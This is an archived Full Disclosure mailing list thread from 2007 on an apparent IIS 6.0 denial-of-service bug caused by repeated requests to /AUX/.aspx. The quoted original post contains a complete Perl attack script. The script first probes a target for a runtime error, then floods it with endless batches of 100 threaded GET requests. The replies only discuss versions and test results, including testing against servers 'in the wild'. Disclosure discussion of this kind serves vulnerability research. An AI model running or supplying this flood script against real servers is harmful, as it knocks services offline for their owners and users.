Full Disclosure mailing list archives
Question Regarding IIS 6.0 / Is this a DoS???
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Tue, 22 May 2007 11:36:14 -0400
MacOS 10.2.8 also appears to be invulnerable to this. When I attempt to exploit the bug on a default install, I get 'connection refused' error. Joey On Tue, 22 May 2007 11:22:51 -0400 kingcope <kingcope () gmx net> wrote:
Hello Stan, This is a good question. When I tested this on the latest Windows Server 2007 with IIS/6.0 locally there was nothing Like a DoS. On different Windows Servers in the wild the effect was That the servers did not respond for about 5 minutes after sending The packets for ~20 seconds in many cases (also 5.0). Running the script for several minutes gave me an HTTPException on /. Perhaps this may be a configuration issue? Best Regards, kcope -----Original Message----- From: Stan Bubrouski [mailto:stan.bubrouski () gmail com] Sent: Tuesday, May 22, 2007 5:07 PM To: kingcope Cc: full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS??? What version of the .NET framework is running on the server? 1.1.x, 2.0.x, or 3.0.x? -sb On 5/22/07, kingcope <kingcope () gmx net> wrote:Hello List, Recently I saw a small bug in IIS 6.0 when requesting a specialpath.When I request /AUX/.aspx the server takes a bit longer torespond asNormally. So I did write an automated script to see what happensifI request this file several times at once. The result is thatsome serversOn the internet get quite instable, some do not. On some serversafter IStop the attack I get an exception that the Server is toobusy/UnhandledException on the wwwroot (/) path. Can you/the list confirm that? Here is a lame testing script for this stuff: #When sending multiple parallel GET requests to a IIS 6.0 serverrequesting#/AUX/.aspx the server gets instable and non responsive. Thishappens only#to servers which respond a runtime error(System.Web.HttpException)#and take two or more seconds to respond to the /AUX/.aspx GETrequest.# # #signed, #Kingcope kingcope () gmx net################################################################### ##########**************************************************************** *******### ### ### ### Lame Internet Information Server 6.0 Denial Of Service(nonpermanent)### by Kingcope, May/2007 ### Better run this from a Linux system################################################################### #######use IO::Socket; use threads; if ($ARGV[0] eq "") { exit; } my $host = $ARGV[0]; $|=1; sub sendit { $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp'); print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n"; } $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 'http(80)', Proto => 'tcp'); print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n"; $k=0; while (<$sock>) { if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)){$k=1; last; } } if ($k==0) { print "Server does not seem vulnerable to thisattack.\n";exit; } print "ATTACK!\n"; while(1){ for (my $i=0;$i<=100;$i++) { $thr = threads->new(\&sendit); print "\r\r\r$i/100 "; } foreach $thr (threads->list) { $thr->join; } } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Question Regarding IIS 6.0 / Is this a DoS??? Joey Mengele (May 22)
- Re: Question Regarding IIS 6.0 / Is this a DoS??? Valdis . Kletnieks (May 22)
- <Possible follow-ups>
- Question Regarding IIS 6.0 / Is this a DoS??? Joey Mengele (May 22)